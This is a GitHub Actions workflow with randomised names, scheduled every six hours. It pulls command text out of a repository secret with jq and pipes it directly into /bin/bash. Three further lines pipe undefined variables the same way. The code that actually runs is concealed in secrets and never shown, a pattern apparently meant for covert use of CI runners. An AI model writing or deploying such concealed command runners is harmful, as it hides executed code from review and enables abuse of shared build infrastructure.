name: zhengshijin3901

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhengshijin3901
        env:
          hvzp402: ${{ secrets.hvzp402 }}
        run: |
          echo $hvzp402 | jq -r .rdcx11238 | /bin/bash
          echo $dy604 | jq -r .vaxzp1 | /bin/bash
          echo $xgfkc37048 | jq -r .gsscv30 | /bin/bash
          echo $smljw95341 | jq -r .ky5 | /bin/bash

